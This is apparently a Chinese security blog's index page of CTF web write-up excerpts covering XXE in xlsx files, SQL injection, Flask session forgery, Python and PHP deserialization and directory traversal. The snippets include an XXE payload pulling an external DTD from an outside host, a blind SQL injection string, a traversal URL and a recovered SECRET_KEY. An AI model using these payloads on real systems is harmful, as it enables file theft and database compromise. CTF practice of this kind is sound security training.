刘功瑞的博客

有一天你突然惊醒,发现这一切,都只不过是一场梦。

SWPU CTF2019 Web5 WriteUp (xxe,java xxe,axis,excel)

根据题目提示是java xxe,先测试出xxe所在位置为xlsx的[Content_Types].xml文件先使用xxe读取目录payload放到excel里面<!DOCTYPE ANY[ <!ENTITY % send SYSTEM 'http://www.liugongrui.com/ctf/xxe/test.dtd'> %send; %test; %back; ]>test.dtd 放到自己

SWPU CTF2019 Web4 WriteUp (sql注入,代码审计,堆叠注入,PDO,文件包含)

注入脚本:# coding=utf-8 import re import requests import sys import binascii import json reload(sys) sys.setdefaultencoding("utf8") url = "http://182.92.220.157:11116/index.php?r=Login/Logi

SWPU CTF2019 Web3 WriteUp (SECRET_KEY 计算cookie,unzip 命令执行,软链接)

知识点:SECRET_KEY 计算cookie,unzip 命令执行,软链接解题思路SECRET_KEY:keyqqqwwweee!@#$%^&*用flask session cookie manager解密和重加密一下,修改id为1.eJyrVspMUbKqVlJIUrJS8g20tVWq1VHKLI7PyU_PzFOyKikqTdVRKkgsLi7PLwIqVEpMyQWK6yiVFqcW5SXmpsKFagFiyxgX.XekyGw.wYomzVd7LK9ea7WN-mZaQ0gl

SWPU CTF2019 Web2 WriteUp (Python反序列化,redis,session)

参考https://segmentfault.com/a/1190000013099825Python 反序列化安全问题(一)这一段时间使用flask做web开发,使用了redis存储session,阅读了flask_session源码,发现在存储session到redis过程中,利用了cPickle模块进行序列化以及反序列化;正好根据该样例学习一波Python反序列化相关的安全问题,不足之处请各位表哥指出。一、基础知识讲解1.1 cPickle模块Python中主要是用cPickle和pick

SWPU CTF2019 Web1 WriteUp (0'*'0注入)

知识点:sql注入注入点  0'/**/||/**/ascii(substr((select/**/pass/**/from/**/users/**/where/**/name='flag'),0,1))/**/>/**/ascii('53')/**/||/**/'0先注册个用户,然后发布广告广告的title可以注入注入脚本# coding=utf-8 import re import r

XCTF 攻防世界 web进阶 TimeKeeper writeup

知识点目录穿越,可任意文件读取flask模板注入,可获取SECRET_KEY,从而伪造session成为管理员上传tar文件自解压,可利用软连接读文件debug模式,生成pin码的关键信息都可获取到,计算pin码,执行命令目录穿越http://111.198.29.45:38930/asserts/..%2f..%2f..%2f..%2fflag   #读取假的flag   ciscn{this_is_a_sample_flag}格式化字符串+SESSIO

XCTF 攻防世界 web进阶 filemanager writeup

先扫目录,得到源码代码审计此题入口点是二次注入。 在common.inc.php中可以看到全局进行了转义,这样常规注入少了大部分。遍观代码,输入处没有任何反转义、反解压、数字型等特殊情况,基本可以确定不存在直接的注入漏洞。 看到上传处的代码upload.php:<?php$name = basename($file["name"]); $path_parts = pathinfo($name);if(!in_array($pat

2019湖湘杯web(代码审计 untar) writeup

<?php     $sandbox = "sandbox/" . md5($_SERVER["REMOTE_ADDR"]);     echo $sandbox."</br>";     @mkdir($sandbox);  &nb

2019年CNAS网络安全等级保护测评能力验证与攻防大赛 Writeup

第一题身份鉴别   分数:100【IP】:172.20.2.30【端口】  9001【标准要求】8.1.4.1 身份鉴别 b)应具有登录失败处理功能,应配置并启用结束会话、限制非法登录次数和当登录连接超时自动退出等相关措施。【场景说明】网络安全等级保护标准中要求,应用系统应该对用户进行身份标识和鉴别,当存在非法暴力破解、弱口令猜测、连续登录失败次数过多等情况,应该配置并启用结束会话、限制非法登录次数/频率和当登录连接超时自动退出等相关措施,防止用户名和口令

CTF PHP反序列化

目录php反序列化1、序列的含义2、public、protected、private下序列化对象的区别1、构造函数和析构函数2、__sleep()和__wakeup()3、__toString()4、__set(), __get(), __isset(), __unset()5、其他一、序列化二、魔术方法三、序列化细节四、反序列化的利用五、Session序列化问题六、Phar反序列化php反序列化一、序列化所有php里面的值都可以使用函数serialize()来返回一个包含字节流的字符串来表示。

Powered By Z-BlogPHP 1.5.2 Zero

Copyright www.liugongrui.com.All Rights Reserved.